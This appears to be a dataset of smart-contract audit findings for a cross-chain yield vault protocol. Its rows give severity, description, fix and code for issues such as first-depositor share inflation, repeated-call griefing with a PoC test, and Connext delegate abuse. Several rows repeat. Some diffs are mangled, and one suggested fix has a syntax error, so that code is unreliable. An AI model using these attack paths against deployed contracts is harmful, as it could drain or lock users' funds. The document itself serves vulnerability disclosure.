blacklist"");\\n deltaAllocations[_protocolNum] += _allocation;\\n deltaAllocatedTokens += _allocation;\\n }\\n```\\n\\nand You won't be able to execute rebalance()",Issue Malicious users could set allocations to a blacklist Protocol and break the rebalancing logic\\nYou should check if the Protocol on the blacklist when Game players `rebalanceBasket()`,The guardian isn't able to restart the protocol manually. `game.sol` loses the value of the `deltas`. The whole system is down.,```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n +inflate initial share price by initial depositor,medium,"initial deposit can be front-runned by non-whitelist address to inflate share price evading the `training` block, then all users after the first (the attacker) will receive no shares in return for their deposit.\\n`training` block inside `deposit` function intended to be set as true right after deployment. This `training` variable is to make sure the early depositor address is in the whitelist, thus negating any malicious behaviour (especially the first initial depositor)\\n```\\nFile: MainVault.sol\\n function deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n```\\n\\nFirst initial depositor issue is pretty well-known issue in vault share-based token minting for initial deposit which is susceptible to manipulation. This issue arise when the initial vault balance is 0, and initial depositor (attacker) can manipulate this share accounting by donating small amount, thus inflate the share price of his deposit. There are a lot of findings about this initial depositor share issue.\\nEven though the `training` block is (probably) written to mitigate this initial deposit, but since the execution of setting the `training` to be true is not in one transaction, then it's possible to be front-runned by attacker. Then this is again, will make the initial deposit susceptible to attack.\\nThe attack vector and impact is the same as TOB-YEARN-003, where users may not receive shares in exchange for their deposits if the total asset amount has been manipulated through a large “donation”.\\nThe initial exchangeRate is a fixed value set on constructor which is not related to totalSupply, but later it will use this totalSupply\\n```\\nFile: MainVault.sol\\n exchangeRate = _uScale;\\n// rest of code\\n function setXChainAllocationInt(\\n uint256 _amountToSend,\\n uint256 _exchangeRate,\\n bool _receivingFunds\\n ) internal {\\n amountToSendXChain = _amountToSend;\\n exchangeRate = _exchangeRate;\\n\\n if (_amountToSend == 0 && !_receivingFunds) settleReservedFunds();\\n else if (_amountToSend == 0 && _receivingFunds) state = State.WaitingForFunds;\\n else state = State.SendingFundsXChain;\\n }\\n\\nFile: XChainController.sol\\n uint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;\\n uint256 totalSupply = getTotalSupply(_vaultNumber);\\n\\n uint256 decimals = xProvider.getDecimals(vault);\\n uint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;\\n```\\n","The simplest way around for this is just set the initial `training` to be `true` either in the variable definition or set it in constructor, so the initial depositor will be from the whitelist.\\nor, more common solution for this issue is, require a minimum size for the first deposit and burn a portion of the initial shares (or transfer it to a secure address)","initial depositor can inflate share price, other user (next depositor) can lost their asset","```\\nFile: MainVault.sol\\n function deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n```\\n" +Wrong calculation of `balanceBefore` and `balanceAfter` in deposit method,medium,"Deposit method calculate net amount transferred from user. It use `reservedFunds` also in consideration when calculating `balanceBefore` and `balanceAfter` but it is not actually require.\\n```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n\\nDeposit may fail when `reservedFunds` is greater than `getVaultBalance()`","Issue Wrong calculation of `balanceBefore` and `balanceAfter` in deposit method\\nUse below code. This is correct way of finding net amount transfer by depositor\\n```\\n uint256 balanceBefore = getVaultBalance();\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance();\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n",Deposit may fail when `reservedFunds` is greater than `getVaultBalance()`,"```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n" +Vault could `rebalance()` before funds arrive from xChainController,medium,"Invoke sendFundsToVault() to Push funds from xChainController to vaults. which is call xTransferToVaults()\\nFor the cross-chain rebalancing `xTransferToVaults()` will execute this logic\\n```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n\\n`pushFeedbackToVault()` Is to invoke receiveFunds() `pushFeedbackToVault()` always travel through the slow path\\n`xTransfer()` to transfer funds from one chain to another If fast liquidity is not available, the `xTransfer()` will go through the slow path.\\nThe vulnerability is if the `xcall()` of `pushFeedbackToVault()` excited successfully before `xTransfer()` transfer the funds to the vault, anyone can invoke rebalance() this will lead to rebalancing Vaults with Imperfect funds (this could be true only if funds that are expected to be received from XChainController are greater than `reservedFunds` and `liquidityPerc` together )\\nThe above scenario could be done in two possible cases 1- `xTransfer()` will go through the slow path but because High Slippage the cross-chain message will wait until slippage conditions improve (relayers will continuously re-attempt the transfer execution).\\n2- Connext Team says\\n```\\nAll messages are added to a Merkle root which is sent across chains every 30 mins\\nAnd then those messages are executed by off-chain actors called routers\\n\\nso it is indeed possible that messages are received out of order (and potentially with increased latency in between due to batch times) \\nFor ""fast path"" (unauthenticated) messages, latency is not a concern, but ordering may still be (this is an artifact of the chain itself too btw)\\none thing you can do is add a nonce to your messages so that you can yourself order them at destination\\n```\\n\\nso `pushFeedbackToVault()` and `xTransfer()` could be added to a different Merkle root and this will lead to executing `receiveFunds()` before funds arrive.",Check if funds are arrived or not,"The vault could `rebalance()` before funds arrive from xChainController, this will reduce rewards","```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n" +`XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad state,medium,"A user can grief the send funds to vault state transition during by calling `sendFundsToVault` multiple times with the same vault.\\nDuring rebalancing, some vaults might need funds sent to them. They will be in state `WaitingForFunds`. To transition from here any user can trigger `XChainController` to send them funds by calling `sendFundsToVault`.\\nThis is trigger per chain and will transfer funds from `XChainController` to the respective vaults on each chain.\\nAt the end, when the vaults on each chain are processed and either have gotten funds sent to them or didn't need to `sendFundsToVaults` will trigger the state for this `vaultNumber` to be reset.\\nHowever, when transferring funds, there's never any check that this chain has not already been processed. So any user could simply call this function for a vault that either has no funds to transfer or where there's enough funds in `XChainController` and trigger the state reset for the vault.\\nPoC in `xChaincontroller.test.ts`, run after 4.5) Trigger vaults to transfer funds to xChainController:\\n```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n","I recommend the protocol either keeps track of which vaults have been sent funds in `XChainController`.\\nor changes so a vault can only receive funds when waiting for them:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\nindex 8739e24..d475ee6 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n@@ // Remove the line below\\n328,7 // Add the line below\\n328,7 @@ contract MainVault is Vault, VaultToken {\\n /// @notice Step 5 end; Push funds from xChainController to vaults\\n /// @notice Receiving feedback from xController when funds are received, so the vault can rebalance\\n function receiveFunds() external onlyXProvider {\\n// Remove the line below\\n if (state != State.WaitingForFunds) return;\\n// Add the line below\\n require(state == State.WaitingForFunds,stateError);\\n settleReservedFunds();\\n }\\n \\n```\\n",XChainController ends up out of sync with the vault(s) that were supposed to receive funds.\\n`guardian` can resolve this by resetting the states using admin functions but these functions can still be frontrun by a malicious user.\\nUntil this is resolved the rebalancing of the impacted vaults cannot continue.,"```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n" +Protocol is will not work on most of the supported blockchains due to hardcoded WETH contract address.,medium,"The WETH address is hardcoded in the `Swap` library.\\nAs stated in the README.md, the protocol will be deployed on the following EVM blockchains - Ethereum Mainnet, Arbitrum, Optimism, Polygon, Binance Smart Chain. While the project has integration tests with an ethereum mainnet RPC, they don't catch that on different chains like for example Polygon saveral functionallities will not actually work because of the hardcoded WETH address in the Swap.sol library:\\n```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\n",The WETH variable should be immutable in the Vault contract instead of a constant in the Swap library and the Wrapped Native Token contract address should be passed in the Vault constructor on each separate deployment.,Protocol will not work on most of the supported blockchains.,```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\n +"Rebalancing can be indefinitely blocked due to ever-increasing `totalWithdrawalRequests`, causing locking of funds in vaults",medium,"Rebalancing can get stuck indefinitely at the `pushVaultAmounts` step due to an error in the accounting of `totalWithdrawalRequests`. As a result, funds will be locked in vaults since requested withdrawals are only executed after a next successful rebalance.\\nFunds deposited to underlying protocols can only be withdrawn from vaults after a next successful rebalance:\\na depositor has to make a withdrawal request first, which is tracked in the current rebalance period;\\nrequested funds can be withdrawn in the next rebalance period.\\nThus, it's critical that rebalancing doesn't get stuck during one of its stages.\\nDuring rebalancing, vaults report their balances to `XChainController` via the pushTotalUnderlyingToController function: the functions sends the current unlocked (i.e. excluding reserved funds) underlying token balance of the vault and the total amount of withdrawn requests in the current period. The latter amount is stored in the `totalWithdrawalRequests` storage variable:\\nthe variable is increased when a new withdrawal request is made;\\nand it's set to 0 after the vault has been rebalanced-it's value is added to the reserved funds.\\nThe logic of `totalWithdrawalRequests` is that it tracks only the requested withdrawal amounts in the current period-this amount becomes reserved during rebalancing and is added to `reservedFunds` after the vault has been rebalanced.\\nWhen `XChainController` receives underlying balances and withdrawal requests from vaults, it tracks them internally. The amounts then used to calculate how much tokens a vault needs to send or receive after a rebalancing: the total withdrawal amount is subtracted from vault's underlying balance so that it's excluded from the amounts that will be sent to the protocols and so that it could then be added to the reserved funds of the vault.\\nHowever, `totalWithdrawalRequests` in `XChainController` is not reset between rebalancings: when a new rebalancing starts, `XChainController` receives allocations from the Game and calls `resetVaultUnderlying`, which resets the underlying balances receive from vaults in the previous rebalancing. `resetVaultUnderlying` doesn't set `totalWithdrawalRequests` to 0:\\n```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n\\nThis cause the value of `totalWithdrawalRequests` to accumulate over time. At some point, the total historical amount of all withdrawal requests (which `totalWithdrawalRequests` actually tracks) will be greater than the underlying balance of a vault, and this line will revert due to an underflow in the subtraction:\\n```\\nuint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;\\n```\\n","In `XChainController.resetVaultUnderlying`, consider setting `vaults[_vaultNumber].totalWithdrawalRequests` to 0. `totalWithdrawalRequests`, like its `MainVault.totalWithdrawalRequests` counterpart, tracks withdrawal requests only in the current period and should be reset to 0 between rebalancings.","Due to accumulation of withdrawal request amounts in the `totalWithdrawalRequests` variable, `XChainController.pushVaultAmounts` can be blocked indefinitely after the value of `totalWithdrawalRequests` has grown bigger than the value of `totalUnderlying` of a vault. Since withdrawals from vaults are delayed and enable in a next rebalancing period, depositors may not be able to withdraw their funds from vaults, due to a block rebalancing.\\nWhile `XChainController` implements a bunch of functions restricted to the guardian that allow the guardian to push a rebalancing through, neither of these functions resets the value of `totalWithdrawalRequests`. If `totalWithdrawalRequests` becomes bigger than `totalUnderlying`, the guardian won't be able to fix the state of `XChainController` and push the rebalancing through.",```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n +Wrong type casting leads to unsigned integer underflow exception when current price is < last price,medium,"When the current price of a locked token is lower than the last price, the Vault.storePriceAndRewards will revert because of the wrong integer casting.\\nThe following line appears in Vault.storePriceAndRewards:\\n```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n\\nIf lastPrices[_protocolId] is higher than the currentPrice, the solidity compiler will revert due the underflow of subtracting unsigned integers because it will first try to calculate the result of `currentPrice - lastPrices[_protocolId]` and then try to cast it to int256.",Casting should be performed in the following way to avoid underflow and to allow the priceDiff being negative:\\n```\\nint256 priceDiff = int256(currentPrice) - int256(lastPrices[_protocolId]));\\n```\\n,The rebalance will fail when the current token price is less than the last one stored.,```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n +withdrawal request override,medium,"It is possible that a withdrawal request is overridden during the initial phase.\\nUsers have two options to withdraw: directly or request a withdrawal if not enough funds are available at the moment.\\nWhen making a `withdrawalRequest` it is required that the user has `withdrawalRequestPeriod` not set:\\n```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, ""Already a request"");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n\\nThis will misbehave during the initial period when `rebalancingPeriod` is 0. The check will pass, so if invoked multiple times, it will burn users' shares and overwrite the value.","Require `rebalancingPeriod` != 0 in `withdrawalRequest`, otherwise, force users to directly withdraw.","While not very likely to happen, the impact would be huge, because the users who invoke this function several times before the first rebalance, would burn their shares and lose previous `withdrawalAllowance`. The protocol should prevent such mistakes.","```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, ""Already a request"");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n" +Anyone can execute certain functions that use cross chain messages and potentially cancel them with potential loss of funds.,high,"Certain functions that route messages cross chain on the `Game` and `MainVault` contract are unprotected (anyone can call them under the required state of the vaults). The way the cross chain messaging is implemented in the XProvider makes use of Connext's `xcall()` and sets the `msg.sender` as the `delegate` and `msg.value` as `relayerFee`. There are two possible attack vectors with this:\\nEither an attacker can call the function and set the msg.value to low so it won't be relayed until someone bumps the fee (Connext allows anyone to bump the fee). This however means special action must be taken to bump the fee in such a case.\\nOr the attacker can call the function (which irreversibly changes the state of the contract) and as the delegate of the `xcall` cancel the message. This functionality is however not yet active on Connext, but the moment it is the attacker will be able to change the state of the contract on the origin chain and make the cross chain message not execute on the destination chain leaving the contracts on the two chains out of synch with possible loss of funds as a result.\\nThe `XProvider` contract's `xsend()` function sets the `msg.sender` as the delegate and `msg.value` as `relayerFee`\\n```\\n uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // _slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n\\n`xTransfer()` using `msg.sender` as delegate:\\n```\\n IConnext(connext).xcall{value: (msg.value - _relayerFee)}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n _recipient, // _to: address receiving the funds on the destination\\n _token, // _asset: address of the token contract\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n _amount, // _amount: amount of tokens to transfer\\n _slippage, // _slippage: the maximum amount of slippage the user will accept in BPS (e.g. 30 = 0.3%)\\n bytes("""") // _callData: empty bytes because we're only sending funds\\n );\\n }\\n```\\n\\nConnext documentation explaining:\\n```\\nparams.delegate | (optional) Address allowed to cancel an xcall on destination.\\n```\\n\\nConnext documentation seems to indicate this functionality isn't active yet though it isn't clear whether that applies to the cancel itself or only the bridging back the funds to the origin chain.",Provide access control limits to the functions sending message across Connext so only the Guardian can call these functions with the correct msg.value and do not use msg.sender as a delegate but rather a configurable address like the Guardian.,"An attacker can call certain functions which leave the relying contracts on different chains in an unsynched state, with possible loss of funds as a result (mainly on XChainControleler's `sendFundsToVault()` when actual funds are transferred.","```\\n uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // _slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n" +Wrong type casting leads to unsigned integer underflow exception when current price is < last price,high,"When the current price of a locked token is lower than the last price, the Vault.storePriceAndRewards will revert because of the wrong integer casting.\\nThe following line appears in Vault.storePriceAndRewards:\\n```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n\\nIf lastPrices[_protocolId] is higher than the currentPrice, the solidity compiler will revert due the underflow of subtracting unsigned integers because it will first try to calculate the result of `currentPrice - lastPrices[_protocolId]` and then try to cast it to int256.",Casting should be performed in the following way to avoid underflow and to allow the priceDiff being negative:\\n```\\nint256 priceDiff = int256(currentPrice) - int256(lastPrices[_protocolId]));\\n```\\n,The rebalance will fail when the current token price is less than the last one stored.,```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n +Not all providers claim the rewards,high,"Providers wrongly assume that the protocols will no longer incentivize users with extra rewards.\\nAmong the current providers only the `CompoundProvider` claims the `COMP` incentives, others leave the claim function empty:\\n```\\n function claim(address _aToken, address _claimer) public override returns (bool) {}\\n```\\n",Adjust the providers to be ready to claim the rewards if necessary.,The implementations of the providers are based on the current situation. They are not flexible enough to support the rewards in case the incentives are back.,"```\\n function claim(address _aToken, address _claimer) public override returns (bool) {}\\n```\\n" +withdrawal request override,medium,"It is possible that a withdrawal request is overridden during the initial phase.\\nUsers have two options to withdraw: directly or request a withdrawal if not enough funds are available at the moment.\\nWhen making a `withdrawalRequest` it is required that the user has `withdrawalRequestPeriod` not set:\\n```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, ""Already a request"");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n\\nThis will misbehave during the initial period when `rebalancingPeriod` is 0. The check will pass, so if invoked multiple times, it will burn users' shares and overwrite the value.","Require `rebalancingPeriod` != 0 in `withdrawalRequest`, otherwise, force users to directly withdraw.","While not very likely to happen, the impact would be huge, because the users who invoke this function several times before the first rebalance, would burn their shares and lose previous `withdrawalAllowance`. The protocol should prevent such mistakes.","```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, ""Already a request"");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n" +An inactive vault can disrupt rebalancing of active vaults,medium,"An inactive vault can send its total underlying amount to the `XChainController` and disrupt rebalancing of active vaults by increasing the `underlyingReceived` counter:\\nif `pushVaultAmounts` is called before `underlyingReceived` overflows, rebalancing of one of the active vault may get stuck since the vault won't receive XChain allocations;\\nif `pushVaultAmounts` after all active vaults and at least one inactive vault has reported their underlying amounts, rebalancing of all vaults will get stuck.\\nRebalancing of vaults starts when Game.pushAllocationsToController is called. The function sends the allocations made by gamers to the `XChainController`. `XChainController` receives them in the receiveAllocationsFromGame function. In the settleCurrentAllocation function, a vault is marked as inactive if it has no allocations and there are no new allocations for the vault. `receiveAllocationsFromGameInt` remembers the number of active vaults.\\nThe next step of the rebalancing process is reporting vault underlying token balances to the `XChainController` by calling MainVault.pushTotalUnderlyingToController. As you can see, the function can be called in an inactive vault (the only modifier of the function, `onlyWhenIdle`, doesn't check that `vaultOff` is false). `XChainController` receives underlying balances in the setTotalUnderlying function: notice that the function increases the number of balances it has received.\\nNext step is the XChainController.pushVaultAmounts function, which calculates how much tokens each vault should receive after gamers have changed their allocations. The function can be called only when all active vaults have reported their underlying balances:\\n```\\nmodifier onlyWhenUnderlyingsReceived(uint256 _vaultNumber) {\\n require(\\n vaultStage[_vaultNumber].underlyingReceived == vaultStage[_vaultNumber].activeVaults,\\n ""Not all underlyings received""\\n );\\n _;\\n}\\n```\\n\\nHowever, as we saw above, inactive vaults can also report their underlying balances and increase the `underlyingReceived` counter-if this is abused mistakenly or intentionally (e.g. by a malicious actor), vaults may end up in a corrupted state. Since all the functions involved in rebalancing are not restricted (including `pushTotalUnderlyingToController` and pushVaultAmounts), a malicious actor can intentionally disrupt accounting of vaults or block a rebalancing.","In the `MainVault.pushTotalUnderlyingToController` function, consider disallowing inactive vaults (vaults that have `vaultOff` set to true) report their underlying balances.","If an inactive vault reports its underlying balances instead of an active vault (i.e. `pushVaultAmounts` is called when `underlyingReceived` is equal activeVaults), the active vault will be excluded from rebalancing and it won't receive updated allocations in the current period. Since the rebalancing interval is 2 weeks, the vault will lose the increased yield that might've been generated thanks to new allocations.\\nIf an inactive vault reports its underlying balances in addition to all active vaults (i.e. `pushVaultAmounts` is called when `underlyingReceived` is greater than activeVaults), then `pushVaultAmounts` will always revert and rebalancing will get stuck.","```\\nmodifier onlyWhenUnderlyingsReceived(uint256 _vaultNumber) {\\n require(\\n vaultStage[_vaultNumber].underlyingReceived == vaultStage[_vaultNumber].activeVaults,\\n ""Not all underlyings received""\\n );\\n _;\\n}\\n```\\n" +"Rebalancing can be indefinitely blocked due to ever-increasing `totalWithdrawalRequests`, causing locking of funds in vaults",medium,"Rebalancing can get stuck indefinitely at the `pushVaultAmounts` step due to an error in the accounting of `totalWithdrawalRequests`. As a result, funds will be locked in vaults since requested withdrawals are only executed after a next successful rebalance.\\nFunds deposited to underlying protocols can only be withdrawn from vaults after a next successful rebalance:\\na depositor has to make a withdrawal request first, which is tracked in the current rebalance period;\\nrequested funds can be withdrawn in the next rebalance period.\\nThus, it's critical that rebalancing doesn't get stuck during one of its stages.\\nDuring rebalancing, vaults report their balances to `XChainController` via the pushTotalUnderlyingToController function: the functions sends the current unlocked (i.e. excluding reserved funds) underlying token balance of the vault and the total amount of withdrawn requests in the current period. The latter amount is stored in the `totalWithdrawalRequests` storage variable:\\nthe variable is increased when a new withdrawal request is made;\\nand it's set to 0 after the vault has been rebalanced-it's value is added to the reserved funds.\\nThe logic of `totalWithdrawalRequests` is that it tracks only the requested withdrawal amounts in the current period-this amount becomes reserved during rebalancing and is added to `reservedFunds` after the vault has been rebalanced.\\nWhen `XChainController` receives underlying balances and withdrawal requests from vaults, it tracks them internally. The amounts then used to calculate how much tokens a vault needs to send or receive after a rebalancing: the total withdrawal amount is subtracted from vault's underlying balance so that it's excluded from the amounts that will be sent to the protocols and so that it could then be added to the reserved funds of the vault.\\nHowever, `totalWithdrawalRequests` in `XChainController` is not reset between rebalancings: when a new rebalancing starts, `XChainController` receives allocations from the Game and calls `resetVaultUnderlying`, which resets the underlying balances receive from vaults in the previous rebalancing. `resetVaultUnderlying` doesn't set `totalWithdrawalRequests` to 0:\\n```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n\\nThis cause the value of `totalWithdrawalRequests` to accumulate over time. At some point, the total historical amount of all withdrawal requests (which `totalWithdrawalRequests` actually tracks) will be greater than the underlying balance of a vault, and this line will revert due to an underflow in the subtraction:\\n```\\nuint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;\\n```\\n","In `XChainController.resetVaultUnderlying`, consider setting `vaults[_vaultNumber].totalWithdrawalRequests` to 0. `totalWithdrawalRequests`, like its `MainVault.totalWithdrawalRequests` counterpart, tracks withdrawal requests only in the current period and should be reset to 0 between rebalancings.","Due to accumulation of withdrawal request amounts in the `totalWithdrawalRequests` variable, `XChainController.pushVaultAmounts` can be blocked indefinitely after the value of `totalWithdrawalRequests` has grown bigger than the value of `totalUnderlying` of a vault. Since withdrawals from vaults are delayed and enable in a next rebalancing period, depositors may not be able to withdraw their funds from vaults, due to a block rebalancing.\\nWhile `XChainController` implements a bunch of functions restricted to the guardian that allow the guardian to push a rebalancing through, neither of these functions resets the value of `totalWithdrawalRequests`. If `totalWithdrawalRequests` becomes bigger than `totalUnderlying`, the guardian won't be able to fix the state of `XChainController` and push the rebalancing through.",```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n +`XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad state,medium,"A user can grief the send funds to vault state transition during by calling `sendFundsToVault` multiple times with the same vault.\\nDuring rebalancing, some vaults might need funds sent to them. They will be in state `WaitingForFunds`. To transition from here any user can trigger `XChainController` to send them funds by calling `sendFundsToVault`.\\nThis is trigger per chain and will transfer funds from `XChainController` to the respective vaults on each chain.\\nAt the end, when the vaults on each chain are processed and either have gotten funds sent to them or didn't need to `sendFundsToVaults` will trigger the state for this `vaultNumber` to be reset.\\nHowever, when transferring funds, there's never any check that this chain has not already been processed. So any user could simply call this function for a vault that either has no funds to transfer or where there's enough funds in `XChainController` and trigger the state reset for the vault.\\nPoC in `xChaincontroller.test.ts`, run after 4.5) Trigger vaults to transfer funds to xChainController:\\n```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n","Issue `XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad state\\nI recommend the protocol either keeps track of which vaults have been sent funds in `XChainController`.\\nor changes so a vault can only receive funds when waiting for them:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\nindex 8739e24..d475ee6 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/derby// Remove the line below\\nyield// Remove 